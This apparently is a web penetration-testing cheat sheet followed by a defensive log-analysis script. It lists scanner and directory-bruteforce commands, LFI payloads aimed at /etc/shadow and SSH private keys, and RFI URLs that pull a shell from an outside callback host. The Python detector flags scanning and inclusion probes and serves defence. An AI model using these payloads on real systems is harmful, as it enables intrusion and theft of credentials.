
Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

Web App Scanners

Nikto:

  • nikto --url <url>

Wpscan:

  • wpscan --url <url>
  • wpscan --url <url> --enumerate ap,at (All Plugins, All Themes)
  • wpscan --url <url> --enumerate u (Usernames)
  • wpscan --url <url> --enumerate v

Web Tools for Directory Scanning:

Dirb:

  • dirb <url>
  • dirb <url> <wordlist>

Gobuster:

  • gobuster -u <url> -w /usr/share/wordlists/
  • gobuster -u <url> -w /usr/share/wordlists/ -a Firefox (Custom Agent)
  • gobuster -u <url> -w /usr/share/wordlists/ -x .php,.txt,.html
  • gobuster -u <url> -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
  • gobuster -e -u <url> -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
  • gobuster -v -e -u <url> -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
  • gobuster -v -e -u <url> -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt
  • gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

Wfuzz:

Dirsearch:

  • dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php

Other Tools:

  • Burp Suite
  • OWASP Zap
  • Cadaver
  • SQLMap
  • Joomscan

Testing for LFI:

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples:

  • http://example.com/index.php?page=etc/passwd
  • http://example.com/index.php?page=etc/passwd%00
  • http://example.com/index.php?page=../../etc/passwd
  • http://example.com/index.php?page=%252e%252e%252f
  • http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux:

  • /etc/passwd
  • /etc/shadow
  • /etc/issue
  • /etc/group
  • /etc/hostname
  • /etc/ssh/ssh_config
  • /etc/ssh/sshd_config
  • /root/.ssh/id_rsa
  • /root/.ssh/authorized_keys
  • /home/user/.ssh/authorized_keys
  • /home/user/.ssh/id_rsa

Windows:

  • /boot.ini
  • /autoexec.bat
  • /windows/system32/drivers/etc/hosts
  • /windows/repair/SAM

Testing for RFI:

  • http://example.com/index.php?page=http://callback.com/shell.txt
  • http://example.com/index.php?page=http://callback.com/shell.txt%00
  • http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
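What the directory-scanning and LFI/RFI sections above look like from the server side, as an added example that is not part of the original notes or of any of the tools listed: a small access-log analyser that (a) flags clients producing a burst of distinct 404 paths, which is the footprint gobuster or dirsearch leave regardless of the `-a` user-agent string, and (b) decodes each query parameter through several layers of percent-encoding so that `%252e%252e%252f`, `%00` null bytes, the `....//` variant and `http:%252f%252f` remote includes are all recognised. The log lines, the host `callback.example`, the client addresses and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" access-log line; referer and user agent are optional
# so that "common" format lines parse as well.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample log (not from the original page). 10.0.0.7 behaves like a
# wordlist scanner hiding behind the Firefox user agent quoted in the gobuster
# command above, 10.0.0.9 sends the LFI/RFI request shapes listed above, and
# 10.0.0.5 is an ordinary visitor. callback.example is a placeholder host.
UA = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

def _line(ip, target, status):
    return f'{ip} - - [10/Oct/2023:13:55:36 +0000] "GET {target} HTTP/1.1" {status} 196 "-" "{UA}"'

SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", "/index.php?page=about", 200)]
    + [_line("10.0.0.7", "/" + p, 404)
       for p in ("admin", "backup", "old", "test.php", "config.txt", "dev.html", "uploads")]
    + [_line("10.0.0.9", "/index.php?page=" + v, 200)
       for v in ("../../etc/passwd", "%252e%252e%252fetc%252fpasswd",
                 "....//....//etc/passwd", "etc/passwd%00",
                 "http://callback.example/shell.txt",
                 "http:%252f%252fcallback.example%252fshell.txt")]
)

def find_scanners(text, min_404=5, min_paths=5):
    """Return {ip: (requests, 404s, distinct 404 paths)} for clients that look like
    wordlist-driven directory scanning: a burst of distinct paths that do not exist.
    The user agent is deliberately not a criterion, because it is trivially spoofed."""
    stats = defaultdict(lambda: [0, 0, set()])
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = stats[m["ip"]]
        entry[0] += 1
        if m["status"] == "404":
            entry[1] += 1
            entry[2].add(urlsplit(m["target"]).path)
    return {ip: (n, n404, len(paths)) for ip, (n, n404, paths) in stats.items()
            if n404 >= min_404 and len(paths) >= min_paths}

TRAVERSAL = re.compile(r"\.\.[/\\]")                  # also catches the "....//" variant
REMOTE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # scheme:// inside a parameter value
SENSITIVE = re.compile(                               # file names from the lists above
    r"etc/(passwd|shadow|issue|group|hostname)|\.ssh/(id_rsa|authorized_keys)"
    r"|boot\.ini|autoexec\.bat|system32/drivers/etc/hosts|repair/sam", re.I)

def canonicalize(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (%252e -> %2e -> .) and
    normalise backslashes; NUL bytes are kept so the caller can flag them."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def inspect_request(target):
    """Return the reasons a request target looks like file-inclusion probing ([] if clean)."""
    reasons = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = canonicalize(raw)
        if "\x00" in value:
            reasons.append(f"{name}: null byte")
        if TRAVERSAL.search(value):
            reasons.append(f"{name}: directory traversal")
        if SENSITIVE.search(value):
            reasons.append(f"{name}: sensitive file name")
        if REMOTE.match(value):
            reasons.append(f"{name}: remote include (URL in parameter)")
    return reasons

def find_file_inclusion(text):
    """Return (ip, target, reasons) for every log line whose parameters trip inspect_request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := inspect_request(m["target"])):
            hits.append((m["ip"], m["target"], reasons))
    return hits

if __name__ == "__main__":
    print("directory scanning:", find_scanners(SAMPLE_LOG))
    for ip, target, reasons in find_file_inclusion(SAMPLE_LOG):
        print(ip, target, reasons)
```

Decoding is capped at three rounds so a hostile parameter cannot keep the analyser busy, and matching is done on the decoded value rather than the raw one, which is why the double-encoded and null-byte forms above are reported alongside the plain `../` form; the same canonicalisation is what an input filter in the application itself should apply before comparing a `page` value against an allow-list.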

Resources